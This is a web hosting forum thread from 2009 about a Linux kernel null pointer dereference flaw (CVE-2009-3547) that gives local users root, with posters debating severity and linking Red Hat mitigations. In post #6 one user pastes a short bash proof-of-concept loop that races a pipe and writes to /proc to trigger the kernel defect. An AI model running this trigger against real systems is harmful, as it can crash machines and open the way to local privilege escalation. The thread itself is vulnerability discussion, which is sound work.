Results 1 to 7 of 7
  1. #1
    Join Date
    May 2006
    Location
    EU & USA
    Posts
    3,684

    Bug in latest Linux gives untrusted users root access

    A software developer has uncovered a bug in most versions of Linux that could allow untrusted users to gain complete control over the open-source operating system.

    The null pointer dereference flaw was only fixed in the upcoming 2.6.32 release candidate of the Linux kernel, making virtually all production versions in use at the moment vulnerable. While attacks can be prevented by implementing a common feature known as mmap_min_addr, the RHEL distribution, short for Red Hat Enterprise Linux, doesn't properly implement that protection, Brad Spengler, who discovered the bug in mid October, told The Register.
    Read the complete article at The Register. New kernels are available for Redhat and CentOS (obviously), and likely others who may be affected.
    » cPanel Servers in Europe: Strasbourg (FR), Haarlem & Amsterdam (NL) & Kent (UK), USA (Los Angeles, St.Louis), Asia (Singapore) | Follow us at Twitter: @040hosting
    »
    Shared | Reseller | (managed) Dedicated Hosting | Domain Registrar | SSL Registrar | Cloudlinux Partner| 040Hosting (Registered company #17093425 KVK Eindhoven, The Netherlands)

  2. #2
    Join Date
    Mar 2003
    Location
    Kansas City, Missouri
    Posts
    462
    Hello,

    This vulnerability can be only be executed as a local user.

    Please see http://www.securityfocus.com/bid/36038/discuss for more information.
    =>Admo.net Managed Hosting
    => Managed Hosting • Dedicated Servers • Colocation
    => Dark Fiber Access to 1102 Grand, Multiple Public Providers
    => Over •Sixteen• Years of Service

  3. #3
    Join Date
    May 2006
    Location
    EU & USA
    Posts
    3,684
    Quote Originally Posted by AdmoNet View Post
    Hello,

    This vulnerability can be only be executed as a local user.

    Please see http://www.securityfocus.com/bid/36038/discuss for more information.
    Doesn't make it less important or dangerous IMHO.

  4. #4
    Join Date
    Mar 2003
    Location
    Kansas City, Missouri
    Posts
    462
    Quote Originally Posted by 040Hosting View Post
    Doesn't make it less important or dangerous IMHO.
    Hello,

    If you are not a shell hosting company and you implement proper firewalls and user access control this vulnerability is very harmless.

    Here is some ways to mitigate the issue according to RH: http://kbase.redhat.com/faq/docs/DOC-18065

    The current CVE level is in "candidate" status which means its still being reviewed by the CVE board and will be posted as "entry" if it is deemed an official CVE.

    This bug has been around since August 18, 2009. Nothing to worry about at this time.
    =>Admo.net Managed Hosting
    => Managed Hosting • Dedicated Servers • Colocation
    => Dark Fiber Access to 1102 Grand, Multiple Public Providers
    => Over •Sixteen• Years of Service

  5. #5
    Join Date
    May 2006
    Location
    EU & USA
    Posts
    3,684
    Quote Originally Posted by AdmoNet View Post
    Hello,

    If you are not a shell hosting company and you implement proper firewalls and user access control this vulnerability is very harmless.

    Here is some ways to mitigate the issue according to RH: http://kbase.redhat.com/faq/docs/DOC-18065

    The current CVE level is in "candidate" status which means its still being reviewed by the CVE board and will be posted as "entry" if it is deemed an official CVE.

    This bug has been around since August 18, 2009. Nothing to worry about at this time.
    We are talking about : CVE-2009-3547
    » cPanel Servers in Europe: Strasbourg (FR), Haarlem & Amsterdam (NL) & Kent (UK), USA (Los Angeles, St.Louis), Asia (Singapore) | Follow us at Twitter: @040hosting
    »
    Shared | Reseller | (managed) Dedicated Hosting | Domain Registrar | SSL Registrar | Cloudlinux Partner| 040Hosting (Registered company #17093425 KVK Eindhoven, The Netherlands)

  6. #6
    Join Date
    Mar 2003
    Location
    Kansas City, Missouri
    Posts
    462
    Hello,

    Thanks for clearing that up. It looks like this CVE is similar to the one I thought you were talking about.

    This one allows a full compromise of the system if you are a local user of the system.

    Proof of concept code:
    Code:
    while : ; do
    { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
    PID=$!
    OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
    { read PID REST ; echo $PID; } )
    OUT="${OUT%% *}"
    DELAY=$((RANDOM * 1000 / 32768))
    usleep $((DELAY * 1000 + RANDOM % 1000 ))
    echo n > /proc/$OUT/fd/1 # Trigger defect
    done
    Last edited by AdmoNet; 11-04-2009 at 12:47 PM.
    =>Admo.net Managed Hosting
    => Managed Hosting • Dedicated Servers • Colocation
    => Dark Fiber Access to 1102 Grand, Multiple Public Providers
    => Over •Sixteen• Years of Service

  7. #7
    Join Date
    Apr 2002
    Location
    USA
    Posts
    5,779
    Quote Originally Posted by AdmoNet View Post
    Hello,

    If you are not a shell hosting company and you implement proper firewalls and user access control this vulnerability is very harmless.

    Here is some ways to mitigate the issue according to RH: http://kbase.redhat.com/faq/docs/DOC-18065

    The current CVE level is in "candidate" status which means its still being reviewed by the CVE board and will be posted as "entry" if it is deemed an official CVE.

    This bug has been around since August 18, 2009. Nothing to worry about at this time.
    You have the wrong kernel exploit.
    http://kbase.redhat.com/faq/docs/DOC-20481

Similar Threads

  1. Users With Root Access
    By persianwhois in forum Hosting Security and Technology
    Replies: 6
    Last Post: 05-22-2008, 10:34 AM
  2. SSL Certificate Problem : Untrusted Root
    By zolcat2 in forum Hosting Security and Technology
    Replies: 1
    Last Post: 07-19-2007, 11:43 AM
  3. Replies: 3
    Last Post: 05-10-2005, 06:12 PM
  4. Linux web hosting with root access
    By JamieD in forum Web Hosting
    Replies: 17
    Last Post: 11-17-2002, 09:39 PM
  5. Making users w/ root access
    By Matthew_J in forum Hosting Security and Technology
    Replies: 3
    Last Post: 04-05-2002, 04:15 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •